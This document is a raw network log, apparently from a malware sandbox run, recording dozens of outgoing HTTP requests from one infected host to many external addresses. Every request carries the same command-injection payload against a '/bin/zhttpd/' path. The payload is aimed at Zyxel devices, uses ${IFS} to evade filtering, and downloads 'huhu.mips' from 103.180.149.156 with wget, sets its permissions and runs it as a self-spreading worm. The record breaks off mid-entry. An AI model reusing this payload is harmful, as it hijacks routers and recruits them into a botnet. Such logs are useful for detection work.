                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.448085070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2335192.168.2.1458914197.178.111.76443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.448101997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2336192.168.2.1454280103.217.220.39443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.448101997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2337192.168.2.1456280156.147.122.85443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.448160887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2338192.168.2.143711498.16.237.51443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.448194981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2339192.168.2.1455194102.14.107.246443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.448234081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2340192.168.2.1448858106.80.92.142443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.448312044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2341192.168.2.1439558121.38.206.69443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.448333979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2342192.168.2.1447676178.236.90.145443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.448359013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2343192.168.2.1438388218.156.142.239443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.448458910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2344192.168.2.1436728191.184.181.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.448482037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2345192.168.2.1444242200.183.39.204443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.448496103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2346192.168.2.1452040221.8.89.252443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.448549986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2347192.168.2.1453688113.178.124.77443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.448600054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2348192.168.2.145796090.171.21.153443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.448609114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2349192.168.2.145427695.45.201.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.448652983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2350192.168.2.1448256188.63.89.25443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.448678970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2351192.168.2.144730419.87.62.99443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.448741913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2352192.168.2.1442948174.221.58.129443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.448786974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2353192.168.2.143728812.32.162.15443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.448852062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2354192.168.2.146049888.19.106.120443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.448852062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2355192.168.2.1458250162.44.89.31443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.448883057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2356192.168.2.1435418176.55.183.53443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.448951960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2357192.168.2.1437334195.89.68.206443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.448966026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2358192.168.2.143831445.193.104.103443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.449013948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2359192.168.2.144358643.46.60.94443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.449064970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2360192.168.2.1457662123.18.57.81443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.449109077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2361192.168.2.1450748109.85.163.163443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.449131966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2362192.168.2.1447190194.15.76.37443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.449179888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2363192.168.2.1448006138.213.221.26443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.449239016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2364192.168.2.144376463.253.227.212443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.449259043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2365192.168.2.143619097.177.211.24443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.449287891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2366192.168.2.145754240.144.105.228443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.449347973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2367192.168.2.144194062.160.13.15443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.449373960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2368192.168.2.1435796144.241.2.174443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.449410915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2369192.168.2.1444032113.88.138.31443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.449461937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2370192.168.2.144171417.125.78.130443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.449536085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2371192.168.2.1438572174.189.185.209443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.449536085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2372192.168.2.145747679.150.84.79443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:44.449582100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2373192.168.2.145566024.145.71.33443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.461667061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2374192.168.2.1451644192.185.239.170443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.461716890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2375192.168.2.1443048130.91.116.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.461752892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2376192.168.2.144821491.164.18.27443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.461792946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2377192.168.2.1450266131.77.133.136443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.461839914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2378192.168.2.1439792175.69.148.127443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.461846113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2379192.168.2.1442956108.152.25.21443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.461919069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2380192.168.2.1457022139.217.171.135443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.461937904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2381192.168.2.1456094200.132.32.30443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.461967945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2382192.168.2.1446636147.224.87.225443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.462033987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2383192.168.2.1455882137.42.240.153443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.462060928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2384192.168.2.1440084100.174.214.230443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.462129116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2385192.168.2.144914268.112.223.15443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.462272882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2386192.168.2.145931039.187.83.112443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.462306023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2387192.168.2.146061265.195.1.12443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.462352991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2388192.168.2.143926484.27.172.200443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.462384939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2389192.168.2.144443879.154.3.74443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.462425947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2390192.168.2.145360636.143.180.48443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.462454081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2391192.168.2.1452314206.92.250.190443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.462464094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2392192.168.2.143775282.50.105.53443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.462532997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2393192.168.2.1449168154.3.138.62443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.462568998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2394192.168.2.1456750200.66.66.225443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.462611914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2395192.168.2.1439162176.247.216.253443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.462642908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2396192.168.2.145489424.50.135.66443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:45.462681055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2397192.168.2.145317264.5.41.81443
                                                      TimestampBytes transferredDirectionData
